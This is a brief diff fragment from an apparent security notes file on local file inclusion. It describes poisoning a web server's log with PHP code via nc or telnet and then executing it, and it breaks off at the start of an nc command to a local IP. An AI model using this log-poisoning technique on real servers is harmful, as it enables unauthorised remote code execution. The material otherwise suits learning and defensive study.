xapax/security/local_file_inclusion.md

 So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.

-1. Insert php-code into the log file.
+**Insert php-code into the log file**

 This can be done with nc or telnet.

 ```
 nc 192.168.1.102 80